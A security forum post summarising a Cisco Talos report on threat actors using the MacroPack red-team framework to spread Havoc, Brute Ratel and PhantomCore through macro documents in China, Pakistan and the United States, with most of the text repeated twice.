Friend
Professional
- Messages
- 2,653
- Reaction score
- 863
- Points
- 113
The tool for Red Team has become a powerful tool for stealthy attacks around the world.
Cisco Talos has discovered that the MacroPack red command framework is being actively used by threat actors to distribute the Havoc malware, Brute Ratel, and the PhantomCore RAT Trojan.
During the analysis of malicious document downloads on the VirusTotal platform, samples from different countries, including the United States, China, and Pakistan, were identified. The documents varied in sophistication, decoys, and infection methods, indicating the variety of cyber threats associated with the use of MacroPack.
Developed by a French developer, MacroPack is a specialized tool for Red Team simulations and exercises to simulate enemy actions. The software offers advanced features such as bypassing antiviruses, anti-reversing techniques, and the ability to create documents with code obfuscation. Such features allow you to hide malicious VB scripts and bypass static analysis, which makes detection much more difficult.
The researchers noticed that hackers often use the paid version of MacroPack Pro, which adds specific VBA routines to documents. The subroutines, while not malicious, serve as an indicator that the document was created using the Pro version of the framework. Opening such a document triggers the first stage of the attack, in which the VBA code downloads a malicious DLL that communicates with the C2 server.
Analysis of the activity showed several significant clusters. In China, Pakistan, and the United States, various campaigns were recorded using documents created with MacroPack:
Brute Ratel has become a popular alternative to Cobalt Strike among hackers since 2022. The tool is actively used to bypass EDR systems and antiviruses. In addition, some ransomware groups are using a cracked version of the tool to carry out stealthy attacks.
Source
Cisco Talos has discovered that the MacroPack red command framework is being actively used by threat actors to distribute the Havoc malware, Brute Ratel, and the PhantomCore RAT Trojan.
During the analysis of malicious document downloads on the VirusTotal platform, samples from different countries, including the United States, China, and Pakistan, were identified. The documents varied in sophistication, decoys, and infection methods, indicating the variety of cyber threats associated with the use of MacroPack.
Developed by a French developer, MacroPack is a specialized tool for Red Team simulations and exercises to simulate enemy actions. The software offers advanced features such as bypassing antiviruses, anti-reversing techniques, and the ability to create documents with code obfuscation. Such features allow you to hide malicious VB scripts and bypass static analysis, which makes detection much more difficult.
The researchers noticed that hackers often use the paid version of MacroPack Pro, which adds specific VBA routines to documents. The subroutines, while not malicious, serve as an indicator that the document was created using the Pro version of the framework. Opening such a document triggers the first stage of the attack, in which the VBA code downloads a malicious DLL that communicates with the C2 server.
Analysis of the activity showed several significant clusters. In China, Pakistan, and the United States, various campaigns were recorded using documents created with MacroPack:
- In China (May-July 2024), documents were circulated urging users to enable macros, which led to the download of Havoc and Brute Ratel malware that communicated with C2 servers in China.
- In Pakistan, documents with military topics were found, which were distributed under the guise of official letters from the Pakistani Air Force. The files used Brute Ratel to transmit malicious data over DNS over HTTPS (DoH) and Amazon CloudFront.
- In the United States (March 2023), the malicious document was presented as an encrypted form to update the NMLS (Mortgage Company Licensing System) and used functions generated by the Markov chain to hide from antiviruses. The document contained code that checked for sandboxing before downloading unknown malware.
Brute Ratel has become a popular alternative to Cobalt Strike among hackers since 2022. The tool is actively used to bypass EDR systems and antiviruses. In addition, some ransomware groups are using a cracked version of the tool to carry out stealthy attacks.
Source
